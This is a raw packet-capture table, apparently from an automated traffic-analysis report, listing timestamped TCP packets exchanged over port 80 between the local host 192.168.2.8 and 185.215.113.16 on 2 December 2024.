                                                                                                                                                                                                        Dec 2, 2024 07:37:55.838846922 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.838885069 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.839797020 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.839900017 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.839998960 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.840881109 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.840984106 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.841094971 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.841984987 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.842191935 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.842248917 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.843055010 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.843159914 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.843234062 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.844137907 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.844233036 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.844281912 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.969805956 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.969819069 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.969851017 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.969861984 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.970012903 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.970012903 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.970279932 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.970293045 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.970334053 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.971318960 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.993019104 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.993088007 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.993133068 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.993566036 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.993658066 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.993666887 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.994657993 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.994720936 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.994740963 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.995754004 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.995801926 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.995893002 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.996834040 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.996906042 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.996912003 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.998085976 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.998164892 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.998306990 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.999248028 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.999294043 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:55.999294043 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.000098944 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.000188112 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.000214100 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.001194000 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.001250982 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.001287937 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.002300978 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.002408981 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.002434969 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.003385067 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.003431082 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.003464937 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.004456997 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.004528046 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.004564047 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.005573034 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.005696058 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.005732059 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.006716013 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.006763935 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.006793022 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.007765055 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.007822990 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.007827044 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.008841038 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.008886099 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.008935928 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.009907961 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.010020018 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.010023117 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.010998011 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.011070013 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.011101961 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.012072086 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.012145996 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.012187004 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.013240099 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.013276100 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.013320923 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.014280081 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.014333010 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.014338017 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.015899897 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.015918970 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.015954971 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.016431093 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.016504049 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.016580105 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.017621040 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.017663956 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.017684937 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.021445990 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.021466970 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.021493912 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.021505117 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.021517992 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.021521091 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.021533012 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.021563053 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.021584988 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.022399902 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.022455931 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.022552013 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.023622990 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.023705006 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.023767948 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.024573088 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.024622917 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.024723053 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.025813103 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.025825977 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.025867939 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.026792049 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.026803970 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.026846886 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.027841091 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.027951956 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.027995110 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.028969049 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.028980017 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.029021025 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.030036926 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.030081034 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.030178070 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.031049967 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.031142950 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.031214952 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.032470942 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.032532930 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.032599926 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.033255100 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.033601999 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.033616066 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.033663988 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.034715891 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.034729004 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.034830093 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.035337925 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.035351992 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.035387993 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.036497116 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.036573887 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.036638975 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.037599087 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.037648916 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.037743092 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.038815975 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.038829088 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.038952112 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.039767027 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.039850950 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.039913893 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.041712046 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.041985035 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.042062044 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.042148113 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.043215990 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.043231010 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.043309927 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.044270039 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.044284105 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.044336081 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.044828892 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.044874907 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.044970989 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.045267105 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.045311928 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.045412064 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.046708107 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.046721935 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.046745062 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.050230980 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.059125900 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.169095993 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.169109106 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.169203043 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.169653893 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.169667006 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.169713020 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.170698881 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.170814991 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.170893908 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.171822071 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.194715977 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.194778919 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.194847107 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.195269108 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.195323944 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.195544958 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.196497917 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.196553946 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.196904898 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.196917057 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.196974039 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.198184967 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.198318958 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.198375940 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.199295044 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.199426889 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.199481964 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.200465918 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.200606108 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.200640917 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.201653004 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.201796055 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.201842070 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.202766895 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.202903032 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.202965975 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.203562975 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.203574896 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.203614950 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.204433918 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.204588890 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.204638004 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.205563068 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.205575943 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.205661058 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.206727982 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.206742048 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.206779957 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.207807064 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.207942963 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.207988024 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.208741903 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.208882093 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.208924055 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.209855080 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.210000038 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.210098028 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.211066008 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.211209059 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.211262941 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.212073088 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.212086916 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.212198973 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.213118076 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.213254929 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.213304996 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.214318991 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.214478970 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.214530945 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.215308905 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.215493917 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.215539932 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.216396093 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.216594934 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.216660976 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.217525959 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.217675924 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.217727900 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.218089104 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.218231916 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.218281984 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.219512939 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.220554113 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.220596075 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.222002983 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.222147942 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.222220898 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.222284079 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.222296000 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.222333908 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.223031998 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.223045111 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.223113060 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.224081039 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.224209070 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.224253893 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.225189924 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.225348949 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.225419998 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.226227045 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.226361036 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:56.226418972 CET4971980192.168.2.8185.215.113.16
